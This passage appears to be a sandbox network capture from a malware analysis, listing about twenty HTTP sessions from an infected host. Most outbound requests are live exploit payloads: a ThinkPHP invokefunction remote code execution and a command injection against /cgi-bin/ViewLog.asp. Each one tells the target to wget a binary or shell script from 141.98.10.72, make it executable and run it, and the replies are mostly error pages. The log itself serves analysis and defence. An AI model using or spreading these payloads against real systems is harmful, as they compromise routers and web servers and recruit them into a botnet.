Feb 14, 2024 09:30:04.004897118 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:04 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
493	192.168.2.15	52590	112.171.68.227	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:03.879539967 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:04.296545029 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:04 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
494	192.168.2.15	48202	31.204.120.12	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:04.073837996 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:04.282697916 CET	304	IN	HTTP/1.1 400 Bad Request Date: Wed, 14 Feb 2024 08:30:04 GMT Server: Apache Content-Length: 126 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 73 63 72 69 70 74 3e 64 6f 63 75 6d 65 6e 74 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 27 2b 6c 6f 63 61 74 69 6f 6e 2e 68 6f 73 74 6e 61 6d 65 2b 27 3a 27 2b 6c 6f 63 61 74 69 6f 6e 2e 70 6f 72 74 3b 3c 2f 73 63 72 69 70 74 3e 3c 68 31 3e 45 72 72 6f 72 20 34 30 30 20 2d 20 74 72 79 69 6e 67 20 74 6f 20 72 65 64 69 72 65 63 74 3c 2f 68 31 3e Data Ascii: <script>document.location.href='https://'+location.hostname+':'+location.port;</script><h1>Error 400 - trying to redirect</h1>

Session ID	Source IP	Source Port	Destination IP	Destination Port
495	192.168.2.15	47878	62.96.114.171	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:04.086051941 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:04.306818962 CET	671	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 08:30:04 GMT Server: Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.4.2 Vary: accept-language,accept-charset Content-Length: 417 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 34 31 20 28 57 69 6e 36 34 29 20 4f 70 65 6e 53 53 4c 2f 31 2e 31 2e 31 63 20 50 48 50 2f 37 2e 34 2e 32 20 53 65 72 76 65 72 20 61 74 20 31 39 32 2e 31 36 38 2e 30 2e 31 34 20 50 6f 72 74 20 38 30 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.41 (Win64) OpenSSL/1.1.1c PHP/7.4.2 Server at 192.168.0.14 Port 80</address></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
496	192.168.2.15	35404	94.123.254.247	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:04.113881111 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
497	192.168.2.15	54246	94.120.2.208	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:04.114933014 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
498	192.168.2.15	48654	94.122.49.69	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:04.115092039 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
499	192.168.2.15	40608	95.86.107.189	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:04.120570898 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
500	192.168.2.15	33864	85.187.18.58	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:04.354629993 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:04.596785069 CET	411	IN	HTTP/1.1 404 Not Found Date: Wed, 14 Feb 2024 10:26:24 GMT Server: Webs X-Frame-Options: SAMEORIGIN Cache-Control: no-cache Content-Length: 166 Content-Type: text/html Connection: keep-alive Keep-Alive: timeout=60, max=99 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
501	192.168.2.15	39856	85.122.223.102	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:04.404129982 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
502	192.168.2.15	59622	95.164.16.136	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:04.479695082 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
503	192.168.2.15	58772	94.173.242.149	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:04.528341055 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
504	192.168.2.15	53324	94.230.135.120	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:04.539211988 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:04.798394918 CET	337	IN	HTTP/1.1 405 Not Allowed Server: Web server Date: Wed, 14 Feb 2024 08:30:03 GMT Content-Type: text/html; charset=utf-8 Content-Length: 155 Connection: keep-alive Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 35 20 4e 6f 74 20 41 6c 6c 6f 77 65 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 57 65 62 20 73 65 72 76 65 72 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>405 Not Allowed</title></head><body><center><h1>405 Not Allowed</h1></center><hr><center>Web server</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
505	192.168.2.15	36532	94.120.209.216	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:04.602392912 CET	314	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
506	192.168.2.15	51690	112.13.121.101	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:04.630815029 CET	319	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:05.042491913 CET	311	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:05 GMT Content-Type: text/html Content-Length: 166 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
507	192.168.2.15	50954	85.130.160.130	8080

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:04.679454088 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
Feb 14, 2024 09:30:05.065078020 CET	326	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 192.168.0.14:80 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: python-requests/2.20.0 Content-Length: 227 Content-Type: application/x-www-form-urlencoded Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68 Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh

Session ID	Source IP	Source Port	Destination IP	Destination Port
508	192.168.2.15	57990	112.124.32.56	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:04.967123985 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:05.290169001 CET	337	IN	HTTP/1.1 400 Bad Request Server: nginx/1.14.1 Date: Wed, 14 Feb 2024 08:30:05 GMT Content-Type: text/html Content-Length: 173 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body bgcolor="white"><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.14.1</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
509	192.168.2.15	51556	88.99.36.119	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:06.226730108 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:06.437678099 CET	307	IN	HTTP/1.1 400 Bad Request Server: nginx Date: Wed, 14 Feb 2024 08:30:06 GMT Content-Type: text/html Content-Length: 150 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
510	192.168.2.15	50708	95.128.42.202	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:06.424087048 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:06.621567011 CET	219	IN	HTTP/1.1 400 Bad request Content-length: 90 Cache-Control: no-cache Connection: close Content-Type: text/html Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 72 65 71 75 65 73 74 3c 2f 68 31 3e 0a 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 6e 20 69 6e 76 61 6c 69 64 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><body><h1>400 Bad request</h1>Your browser sent an invalid request.</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
511	192.168.2.15	60210	95.67.8.239	80

Timestamp	Bytes transferred	Direction	Data
Feb 14, 2024 09:30:06.552746058 CET	331	OUT	GET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: Uirusu/2.0
Feb 14, 2024 09:30:06.784632921 CET	321	IN	HTTP/1.1 400 Bad Request Server: nginx/1.18.0 Date: Wed, 14 Feb 2024 08:30:06 GMT Content-Type: text/html Content-Length: 157 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0</center></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port
512	192.168.2.15	55822	95.56.20.15	80

Timestamp	Bytes transferred	Direction	Data
